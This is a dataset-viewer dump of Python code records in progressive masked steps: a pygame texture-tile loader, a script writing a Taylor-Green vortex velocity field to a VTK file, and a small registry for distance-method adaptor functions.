Load_Texture('Graphics\\\\yellow.png', Size)\n White = Load_Texture('Graphics\\\\white.png', Size)\n Tombstone = Load_Texture('Graphics\\\\tombstone.png', Size)\n Sand = Load_Texture('Graphics\\\\sand.png', Size)\n Plane = Load_Texture('Graphics\\\\plane.png', Size * 8)\n Car1 = Load_Texture('Graphics\\\\car3.png', Size * 6)\n Car2 = Load_Texture('Graphics\\\\car4.png', Size * 6)\n Texture_Tags = {'1': Grass, '2': Stone, '3': Water, '4': Tiles, '5':\n Machine, '6': WifeY, '7': WifeO, '8': DoorOpen, '9': DoorClosed,\n '10': WallLeft, '11': WallUpper, '12': WallRight, '13': WallLower,\n '14': UpperLeftCorner, '15': UpperRightCorner, '16':\n LowerRightCorner, '17': LowerLeftCorner, '18': TowerWall, '19':\n TowerWallLeft, '20': TowerWallRight, '21': WoodFloor, '22':\n Balloons, '23': Yellow, '24': White, '25': Tombstone, '26': Sand,\n '27': Plane, '28': Car1, '29': Car2}\n",
"step-5": "import pygame\n\npygame.init()\n\n\n\nclass Tiles:\n Size = 32\n Blocked = []\n Blocked_Types = [\"5\", \"6\", \"7\", \"9\", \"10\", \"11\", \"12\", \"13\", \"14\", \"15\", \"16\", \"17\", \"18\", \"19\", \"20\", \"25\", \"27\", \"28\", \"29\"]\n\n def Blocked_At(pos):\n if list(pos) in Tiles.Blocked:\n return True\n else:\n return False\n\n\n def Load_Texture(file, Size):\n bitmap = pygame.image.load(file)\n bitmap = pygame.transform.scale(bitmap, (Size, Size))\n surface = pygame.Surface((Size, Size), pygame.HWSURFACE|pygame.SRCALPHA)\n surface.blit(bitmap, (0, 0))\n return surface\n\n\n Tiles = Load_Texture(\"Graphics\\\\hospitalTile.png\", Size)\n Stone = Load_Texture(\"Graphics\\\\stone.png\", Size)\n Grass = Load_Texture(\"Graphics\\\\grass.png\", Size)\n Water = Load_Texture(\"Graphics\\\\water.png\", Size)\n\n Machine = Load_Texture(\"Graphics\\\\hospitalTileMachine.png\", Size*4)\n WifeY = Load_Texture(\"Graphics\\\\young_bed.png\", Size*4)\n WifeO = Load_Texture(\"Graphics\\\\old_bed.png\", Size*4)\n DoorOpen = Load_Texture(\"Graphics\\\\door_open.png\", Size)\n DoorClosed = Load_Texture(\"Graphics\\\\door_closed.png\", Size)\n\n WallLeft = Load_Texture(\"Graphics\\\\leftwall.png\", Size)\n WallUpper = Load_Texture(\"Graphics\\\\upperwall.png\", Size)\n WallRight = Load_Texture(\"Graphics\\\\rightwall.png\", Size)\n WallLower = Load_Texture(\"Graphics\\\\lowerwall.png\", Size)\n UpperLeftCorner = Load_Texture(\"Graphics\\\\left_upperCorner.png\", Size)\n UpperRightCorner = Load_Texture(\"Graphics\\\\right_upperCorner.png\", Size)\n LowerRightCorner = Load_Texture(\"Graphics\\\\right_lowerCorner.png\", Size)\n LowerLeftCorner = Load_Texture(\"Graphics\\\\left_lowerCorner.png\", Size)\n\n TowerWall = Load_Texture(\"Graphics\\\\Towerwall.png\", Size)\n TowerWallLeft = Load_Texture(\"Graphics\\\\TowerwallLeft.png\", Size)\n TowerWallRight = Load_Texture(\"Graphics\\\\TowerwallRight.png\", Size)\n WoodFloor = 
Load_Texture(\"Graphics\\\\woodfloor.png\", Size)\n\n Balloons = Load_Texture(\"Graphics\\\\balloons.png\", Size)\n Yellow = Load_Texture(\"Graphics\\\\yellow.png\", Size)\n White = Load_Texture(\"Graphics\\\\white.png\", Size)\n Tombstone = Load_Texture(\"Graphics\\\\tombstone.png\", Size)\n Sand = Load_Texture(\"Graphics\\\\sand.png\", Size)\n Plane = Load_Texture(\"Graphics\\\\plane.png\", Size * 8)\n Car1 = Load_Texture(\"Graphics\\\\car3.png\", Size * 6)\n Car2 = Load_Texture(\"Graphics\\\\car4.png\", Size * 6)\n\n Texture_Tags = {\"1\" : Grass,\n \"2\" : Stone,\n \"3\" : Water,\n \"4\" : Tiles,\n \"5\" : Machine,\n \"6\" : WifeY,\n \"7\" : WifeO,\n \"8\" : DoorOpen,\n \"9\" : DoorClosed,\n \"10\" : WallLeft,\n \"11\" : WallUpper,\n \"12\" : WallRight,\n \"13\" : WallLower,\n \"14\" : UpperLeftCorner,\n \"15\" : UpperRightCorner,\n \"16\" : LowerRightCorner,\n \"17\" : LowerLeftCorner,\n \"18\" : TowerWall,\n \"19\" : TowerWallLeft,\n \"20\" : TowerWallRight,\n \"21\" : WoodFloor,\n \"22\" : Balloons,\n \"23\" : Yellow,\n \"24\" : White,\n \"25\" : Tombstone,\n \"26\" : Sand,\n \"27\" : Plane,\n \"28\" : Car1,\n \"29\" : Car2}",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from collections import namedtuple
from math import tau, sin, cos, atan2

# Build the initial velocity field of a 3-D Taylor-Green vortex on a
# grid x grid x grid lattice and dump it as a legacy-ASCII VTK
# STRUCTURED_POINTS file (readable by e.g. ParaView).

grid = 21            # number of lattice nodes per axis
points = grid ** 3   # total node count, needed for the VTK header

# Lightweight record for one velocity sample.
Velocity = namedtuple('Velocity', ('x', 'y', 'z'))

velocity = []
for k in range(grid):
    for j in range(grid):
        for i in range(grid):
            # Map lattice indices to phase angles; the 0.25 * tau offset
            # shifts the sample points a quarter period into the domain.
            x = (i / grid + 0.25) * tau
            y = (j / grid + 0.25) * tau
            z = (k / grid + 0.25) * tau
            # Classic Taylor-Green initial condition; the z-component is zero.
            u = cos(x) * sin(y) * cos(z)
            v = -sin(x) * cos(y) * cos(z)
            w = 0.0
            velocity.append(Velocity(u, v, w))

with open('taylor-green.vtk', 'w') as f:
    # Legacy VTK header; the trailing backslash keeps line 1 flush left.
    f.write(f"""\
# vtk DataFile Version 2.0
test
ASCII
DATASET STRUCTURED_POINTS
DIMENSIONS {grid} {grid} {grid}
ORIGIN 0.0 0.0 0.0
SPACING 1.0 1.0 1.0
POINT_DATA {points}
VECTORS velocity float
""")
    for v in velocity:
        f.write(f"{v.x} {v.y} {v.z}\n")
    # Second point attribute: in-plane flow angle at every node.
    f.write("SCALARS angle float\n")
    f.write("LOOKUP_TABLE default\n")
    for v in velocity:
        # ':f' matches the old '%f' formatting (6 decimal places) exactly.
        f.write(f"{atan2(v.y, v.x):f}\n")
|
normal
|
{
"blob_id": "d70986b016e58877c39bfbb76c5bd622c44cbca9",
"index": 9273,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor k in range(grid):\n for j in range(grid):\n for i in range(grid):\n x = (i / grid + 0.25) * tau\n y = (j / grid + 0.25) * tau\n z = (k / grid + 0.25) * tau\n u = cos(x) * sin(y) * cos(z)\n v = -sin(x) * cos(y) * cos(z)\n w = 0.0\n velocity.append(Velocity(u, v, w))\nwith open('taylor-green.vtk', 'w') as f:\n f.write(\n f\"\"\"# vtk DataFile Version 2.0\ntest\nASCII\nDATASET STRUCTURED_POINTS\nDIMENSIONS {grid} {grid} {grid}\nORIGIN 0.0 0.0 0.0\nSPACING 1.0 1.0 1.0\n\nPOINT_DATA {points}\nVECTORS velocity float\n\"\"\"\n )\n for v in velocity:\n f.write(f'{v.x} {v.y} {v.z}\\n')\n f.write('SCALARS angle float\\n')\n f.write('LOOKUP_TABLE default\\n')\n for v in velocity:\n f.write('%f\\n' % atan2(v.y, v.x))\n",
"step-3": "<mask token>\ngrid = 21\nc = grid / 2\npoints = grid ** 3\nVelocity = namedtuple('Velocity', ('x', 'y', 'z'))\nvelocity = []\nfor k in range(grid):\n for j in range(grid):\n for i in range(grid):\n x = (i / grid + 0.25) * tau\n y = (j / grid + 0.25) * tau\n z = (k / grid + 0.25) * tau\n u = cos(x) * sin(y) * cos(z)\n v = -sin(x) * cos(y) * cos(z)\n w = 0.0\n velocity.append(Velocity(u, v, w))\nwith open('taylor-green.vtk', 'w') as f:\n f.write(\n f\"\"\"# vtk DataFile Version 2.0\ntest\nASCII\nDATASET STRUCTURED_POINTS\nDIMENSIONS {grid} {grid} {grid}\nORIGIN 0.0 0.0 0.0\nSPACING 1.0 1.0 1.0\n\nPOINT_DATA {points}\nVECTORS velocity float\n\"\"\"\n )\n for v in velocity:\n f.write(f'{v.x} {v.y} {v.z}\\n')\n f.write('SCALARS angle float\\n')\n f.write('LOOKUP_TABLE default\\n')\n for v in velocity:\n f.write('%f\\n' % atan2(v.y, v.x))\n",
"step-4": "from collections import namedtuple\nfrom math import tau, sin, cos, atan2\ngrid = 21\nc = grid / 2\npoints = grid ** 3\nVelocity = namedtuple('Velocity', ('x', 'y', 'z'))\nvelocity = []\nfor k in range(grid):\n for j in range(grid):\n for i in range(grid):\n x = (i / grid + 0.25) * tau\n y = (j / grid + 0.25) * tau\n z = (k / grid + 0.25) * tau\n u = cos(x) * sin(y) * cos(z)\n v = -sin(x) * cos(y) * cos(z)\n w = 0.0\n velocity.append(Velocity(u, v, w))\nwith open('taylor-green.vtk', 'w') as f:\n f.write(\n f\"\"\"# vtk DataFile Version 2.0\ntest\nASCII\nDATASET STRUCTURED_POINTS\nDIMENSIONS {grid} {grid} {grid}\nORIGIN 0.0 0.0 0.0\nSPACING 1.0 1.0 1.0\n\nPOINT_DATA {points}\nVECTORS velocity float\n\"\"\"\n )\n for v in velocity:\n f.write(f'{v.x} {v.y} {v.z}\\n')\n f.write('SCALARS angle float\\n')\n f.write('LOOKUP_TABLE default\\n')\n for v in velocity:\n f.write('%f\\n' % atan2(v.y, v.x))\n",
"step-5": "from collections import namedtuple\nfrom math import tau, sin, cos, atan2\n\ngrid = 21\nc = grid / 2\npoints = grid**3\n\nVelocity = namedtuple('Velocity', ('x', 'y', 'z'))\n\nvelocity = []\nfor k in range(grid):\n for j in range(grid):\n for i in range(grid):\n x = (i / grid + 0.25) * tau \n y = (j / grid + 0.25) * tau\n z = (k / grid + 0.25) * tau \n u = cos(x) * sin(y) * cos(z)\n v = -sin(x) * cos(y) * cos(z)\n w = 0.0\n velocity.append(Velocity(u, v, w))\n\nwith open('taylor-green.vtk', 'w') as f:\n f.write(f\"\"\"\\\n# vtk DataFile Version 2.0\ntest\nASCII\nDATASET STRUCTURED_POINTS\nDIMENSIONS {grid} {grid} {grid}\nORIGIN 0.0 0.0 0.0\nSPACING 1.0 1.0 1.0\n\nPOINT_DATA {points}\nVECTORS velocity float\n\"\"\")\n for v in velocity:\n f.write(f\"{v.x} {v.y} {v.z}\\n\")\n\n f.write(\"SCALARS angle float\\n\")\n f.write(\"LOOKUP_TABLE default\\n\")\n \n for v in velocity:\n f.write(\"%f\\n\" % atan2(v.y, v.x))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
_method_adaptors = dict()
def register_dist_adaptor(method_name):
    """Decorator factory: register a distance adaptor under *method_name*.

    The undecorated function itself is stored in the module-level
    ``_method_adaptors`` registry, so lookups via ``get_nearest_method``
    bypass the wrapper entirely.

    Args:
        method_name: key under which the adaptor is registered.

    Returns:
        A decorator that registers its target and returns a transparent
        wrapper around it.
    """
    from functools import wraps  # local import keeps the module surface unchanged

    def decorator(func):
        _method_adaptors[method_name] = func

        @wraps(func)  # preserve __name__/__doc__ of the adaptor
        def wrapper(*args, **kwargs):
            # Bug fix: the original wrapper called func but silently
            # discarded its return value, so direct calls to the
            # decorated name always returned None.
            return func(*args, **kwargs)
        return wrapper
    return decorator
def get_nearest_method(method_name, parser):
    """Look up the adaptor registered under *method_name* and invoke it.

    All candidates are tokenised; the protocol is untokenised.

    Input queries have the form::

        [
            (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...),
            (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...),
            ...
        ]

    Returns the adaptor's output — one nearest index per query::

        [nearest_idx1, nearest_idx2, nearest_idx3, ...]

    Raises:
        KeyError: if *method_name* was never registered.
    """
    adaptor = _method_adaptors[method_name]
    return adaptor(parser)
def get_method_names():
    """Return the names of every registered distance method."""
    return list(_method_adaptors)
|
normal
|
{
"blob_id": "ed2f3bbc7eb0a4d8f5ccdb7a12e00cbddab04dd0",
"index": 577,
"step-1": "<mask token>\n\n\ndef get_nearest_method(method_name, parser):\n \"\"\"\n all candidates toked\n all protocol untoked\n input:\n queries:\n [\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n ]\n output:\n [\n nearest_idx1,\n nearest_idx2,\n nearest_idx3,\n ...\n ]\n \"\"\"\n return _method_adaptors[method_name](parser)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_nearest_method(method_name, parser):\n \"\"\"\n all candidates toked\n all protocol untoked\n input:\n queries:\n [\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n ]\n output:\n [\n nearest_idx1,\n nearest_idx2,\n nearest_idx3,\n ...\n ]\n \"\"\"\n return _method_adaptors[method_name](parser)\n\n\ndef get_method_names():\n return list(_method_adaptors.keys())\n",
"step-3": "<mask token>\n\n\ndef register_dist_adaptor(method_name):\n\n def decorator(func):\n _method_adaptors[method_name] = func\n\n def wrapper(*args, **kwargs):\n func(*args, **kwargs)\n return wrapper\n return decorator\n\n\ndef get_nearest_method(method_name, parser):\n \"\"\"\n all candidates toked\n all protocol untoked\n input:\n queries:\n [\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n ]\n output:\n [\n nearest_idx1,\n nearest_idx2,\n nearest_idx3,\n ...\n ]\n \"\"\"\n return _method_adaptors[method_name](parser)\n\n\ndef get_method_names():\n return list(_method_adaptors.keys())\n",
"step-4": "_method_adaptors = dict()\n\n\ndef register_dist_adaptor(method_name):\n\n def decorator(func):\n _method_adaptors[method_name] = func\n\n def wrapper(*args, **kwargs):\n func(*args, **kwargs)\n return wrapper\n return decorator\n\n\ndef get_nearest_method(method_name, parser):\n \"\"\"\n all candidates toked\n all protocol untoked\n input:\n queries:\n [\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n (protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)\n ]\n output:\n [\n nearest_idx1,\n nearest_idx2,\n nearest_idx3,\n ...\n ]\n \"\"\"\n return _method_adaptors[method_name](parser)\n\n\ndef get_method_names():\n return list(_method_adaptors.keys())\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.